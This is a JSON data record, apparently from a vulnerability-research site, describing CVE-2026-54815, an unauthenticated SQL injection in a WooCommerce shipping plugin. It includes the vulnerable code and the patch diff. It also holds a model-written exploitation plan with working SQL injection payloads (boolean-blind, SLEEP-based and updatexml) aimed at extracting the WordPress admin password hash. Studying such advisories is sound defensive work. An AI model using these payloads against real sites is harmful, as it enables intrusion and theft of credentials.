[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ffdrU-0TLOiunwc5yrSAThR-n2G-T10tIT-Xdc2RDw7U":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-54815","cargo-shipping-location-for-woocommerce-unauthenticated-sql-injection","Cargo Shipping Location for WooCommerce \u003C= 5.6 - Unauthenticated SQL Injection","The Cargo Shipping Location for WooCommerce plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 5.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","cargo-shipping-location-for-woocommerce",null,"\u003C=5.6","5.7","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-06-17 00:00:00","2026-06-23 15:41:43",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F5435a8f8-deb7-48c9-9b86-64265e97d602?source=api-prod",7,[22,23,24,25,26,27,28,29],"cargo-shipping-location.php","includes\u002FCSLFW_Helpers.php","includes\u002FCSLFW_ShipmentsPage.php","includes\u002FCargoApi\u002FHelpers.php","includes\u002FCargoApi\u002FWebhook.php","includes\u002Fcslfw-admin.php","includes\u002Fcslfw-cargo.php","includes\u002Fcslfw-front.php","researched",false,3,"# Exploitation Research Plan - CVE-2026-54815\n\n## 1. Vulnerability Summary\nThe **Cargo Shipping Location for WooCommerce** plugin (versions \u003C= 5.6) contains an unauthenticated SQL injection vulnerability. The issue exists within the REST API endpoint used for cargo status updates. The plugin fails to sanitize or prepare the `shipment_id` parameter before including it in a raw SQL query via `$wpdb->get_results()`. Because the endpoint's `permission_callback` is hardcoded to return `true`, any unauthenticated user can trigger the injection.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-json\u002Fcargo-shipping-location-for-woocommerce\u002Fv1\u002Fupdate-status\u002F`\n- **HTTP Method:** `POST`\n- **Vulnerable Parameter:** `shipment_id` (passed in the JSON or POST body)\n- **Authentication:** None (Unauthenticated)\n- **Preconditions:** The plugin must be active. For Boolean-based extraction, at least one WooCommerce order must exist with the `cslfw_shipping` meta key populated (created when a shipment is generated).\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers a REST route in `includes\u002FCargoApi\u002FWebhook.php`:\n   - Hook: `rest_api_init`\n   - Route: `cargo-shipping-location-for-woocommerce\u002Fv1\u002Fupdate-status\u002F`\n   - Permission Callback: `cargo_update_shipment_status_permission` (returns `true`).\n2. **Callback Execution:** The request is handled by `cargo_update_shipment_status($request)`.\n3. **Data Acquisition:** The function retrieves parameters via `$request->get_params()`.\n4. **Sink:**\n   - The code checks if WooCommerce HPOS (High-Performance Order Storage) is enabled to determine the table name (`wc_orders_meta` vs `postmeta`).\n   - It then executes a raw SQL query:\n     ```php\n     $orders = $wpdb->get_results(\n         \"\n         SELECT *\n         FROM {$wpdb->prefix}{$tableName}\n         WHERE meta_key = 'cslfw_shipping' AND meta_value LIKE '%{$data['shipment_id']}%'\n         \"\n     );\n     ```\n   - **Vulnerability:** The value of `{$data['shipment_id']}` is interpolated directly into the query string without using `$wpdb->prepare()`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability resides in a REST API endpoint intended for external webhooks.\n- **Nonce Requirement:** Based on the source code in `includes\u002FCargoApi\u002FWebhook.php`, the `permission_callback` for the `\u002Fupdate-status\u002F` route returns `true` and does not perform any nonce or capability checks.\n- **Conclusion:** No nonce is required for this exploit.\n\n## 5. Exploitation Strategy\nThe exploitation will use **Boolean-based Blind SQL Injection**. The response from the server indicates whether the query returned results:\n- **Success (True):** `{\"success\": true, \"message\": \"Database updated successfully\", ...}`\n- **Failure (False):** `{\"success\": false, \"message\": \"Failed to update database\", ...}`\n\n### Step-by-Step Plan:\n1. **Baseline Test:** Send a request with a `shipment_id` that is known to exist in a shipment meta (e.g., `123`).\n2. **Injection Test (True):** Inject a condition that is always true.\n   - Payload: `123%' AND 1=1 AND '%'='`\n   - Expected: `success: true`\n3. **Injection Test (False):** Inject a condition that is always false.\n   - Payload: `123%' AND 1=0 AND '%'='`\n   - Expected: `success: false`\n4. **Data Extraction:** Use the boolean response to exfiltrate the administrator's password hash from the `wp_users` table.\n\n### Primary Exploit Request:\n- **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-json\u002Fcargo-shipping-location-for-woocommerce\u002Fv1\u002Fupdate-status\u002F`\n- **Method:** `POST`\n- **Headers:** `Content-Type: application\u002Fjson`\n- **Body:**\n  ```json\n  {\n    \"shipment_id\": \"123%' AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_login='admin') AND '%'='\",\n    \"new_status_code\": \"3\",\n    \"new_status\": \"Delivered\"\n  }\n  ```\n\n## 6. Test Data Setup\nTo ensure the `meta_value LIKE` query returns a result initially, we must create a test shipment entry in the database.\n1. **Create Order:** Use WP-CLI to create a WooCommerce order.\n   - `wp eval \"wc_create_order();\"`\n2. **Add Shipment Meta:** Add the expected meta key and value to the order.\n   - `wp post meta add \u003CORDER_ID> cslfw_shipping '{\"123\": {\"status\": \"pending\"}}' --format=json` (Note: the plugin expects a serialized array or JSON string in this meta field).\n\n## 7. Expected Results\n- A successful \"True\" condition will return a JSON response with `\"success\": true`.\n- A successful \"False\" condition will return a JSON response with `\"success\": false`.\n- If `WP_DEBUG` is enabled, an invalid SQL syntax payload (e.g., `shipment_id=123'`) will cause the database error to be logged or potentially displayed.\n\n## 8. Verification Steps\nAfter performing the HTTP-based injection, verify the ability to leak data:\n1. Use the `http_request` tool to check if the first character of the admin password hash is `$`:\n   - Payload: `123%' AND (SELECT 1 FROM wp_users WHERE ID=1 AND SUBSTRING(user_pass,1,1)='$') AND '%'='`\n2. Check the response for `\"success\": true`.\n\n## 9. Alternative Approaches\n- **Time-based Blind:** If the `cslfw_shipping` meta is not easily guessable, use a sleep-based payload.\n  - Payload: `x' OR (SELECT 1 FROM (SELECT(SLEEP(5)))a) OR 'x'='y`\n- **Error-based Injection:** If the site displays SQL errors, use `updatexml()` or `extractvalue()`.\n  - Payload: `123' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1) AND '1'='1`","The Cargo Shipping Location for WooCommerce plugin (versions \u003C= 5.6) is vulnerable to unauthenticated SQL Injection via the 'shipment_id' parameter. The plugin directly interpolates user input into a database query within a REST API endpoint that lacks proper authentication, allowing attackers to extract sensitive information from the WordPress database.","\u002F\u002F includes\u002FCargoApi\u002FWebhook.php:89\n        $orders = $wpdb->get_results(\n            \"\n            SELECT *\n            FROM {$wpdb->prefix}{$tableName}\n            WHERE meta_key = 'cslfw_shipping' AND meta_value LIKE '%{$data['shipment_id']}%'\n            \"\n        );","--- \u002Fincludes\u002FCargoApi\u002FWebhook.php\t2026-03-05 12:55:10.000000000 +0000\n+++ \u002Fincludes\u002FCargoApi\u002FWebhook.php\t2026-04-15 10:21:48.000000000 +0000\n@@ -2,6 +2,7 @@\n namespace CSLFW\\Includes\\CargoAPI;\n \n use CSLFW\\Includes\\CSLFW_Helpers;\n+if ( ! defined( 'ABSPATH' ) ) exit;\n \n class Webhook\n {\n@@ -54,8 +55,51 @@\n \n     public function  cargo_update_shipment_status_permission($request)\n     {\n+        $allowed_domains = [\n+            'api-v2.cargo.co.il',\n+            'dashboard.cargo.co.il',\n+        ];\n+\n+        $cargo_domain = sanitize_text_field( $request->get_header( 'Http-Cargo-Domain' ) );\n+\n+        if ( empty( $cargo_domain ) ) {\n+            return new \\WP_Error(\n+                'rest_forbidden',\n+                __( 'Missing Cargo domain header.', 'cargo-shipping-location-for-woocommerce' ),\n+                [ 'status' => 401 ]\n+            );\n+        }\n+\n+        $cargo_domain = preg_replace( '\u002F^https?:\\\u002F\\\u002F\u002F', '', $cargo_domain );\n+        $cargo_domain = trim( $cargo_domain, '\u002F' );\n+        $cargo_domain = preg_replace( '\u002F^www\\.\u002F', '', $cargo_domain );\n+        $cargo_domain = strtolower( parse_url( 'https:\u002F\u002F' . $cargo_domain, PHP_URL_HOST ) );\n+\n+        if ( ! in_array( $cargo_domain, $allowed_domains, true ) ) {\n+            return new \\WP_Error(\n+                'rest_forbidden',\n+                __( 'Domain not allowed.', 'cargo-shipping-location-for-woocommerce' ),\n+                [ 'status' => 403 ]\n+            );\n+        }\n+\n+        return true;\n     }\n \n@@ -79,12 +123,20 @@\n             $tableName = 'postmeta';\n             $orderIdField = 'post_id';\n         }\n+        $table = $wpdb->prefix . $tableName;\n+        $like  = '%' . $wpdb->esc_like($data['shipment_id']) . '%';\n+\n         $orders = $wpdb->get_results(\n-            \"\n-            SELECT *\n-            FROM {$wpdb->prefix}{$tableName}\n-            WHERE meta_key = 'cslfw_shipping' AND meta_value LIKE '%{$data['shipment_id']}%'\n-            \"\n+            $wpdb->prepare(\n+                \"\n+                    SELECT *\n+                    FROM {$table}\n+                    WHERE meta_key = %s\n+                    AND meta_value LIKE %s\n+                \",\n+                'cslfw_shipping',\n+                $like\n+            )\n         );","The vulnerability is exploited by sending a POST request to the `\u002Fwp-json\u002Fcargo-shipping-location-for-woocommerce\u002Fv1\u002Fupdate-status\u002F` endpoint. No authentication is required because the `permission_callback` for this route is hardcoded to return `true` in versions \u003C= 5.6. An attacker provides a payload in the `shipment_id` parameter of the JSON body that uses a single quote (`'`) to break out of the SQL `LIKE` clause. By appending Boolean logic (e.g., `AND (SELECT 1 FROM wp_users WHERE ID=1 AND user_pass LIKE '$%')`), the attacker can determine if the condition is true or false based on the server's response (`success: true` vs `success: false`). This allows for the iterative extraction of database content, such as administrator password hashes.","gemini-3-flash-preview","2026-06-25 22:24:58","2026-06-25 22:25:44",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","5.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcargo-shipping-location-for-woocommerce\u002Ftags\u002F5.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcargo-shipping-location-for-woocommerce.5.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcargo-shipping-location-for-woocommerce\u002Ftags\u002F5.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcargo-shipping-location-for-woocommerce.5.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcargo-shipping-location-for-woocommerce\u002Ftags"]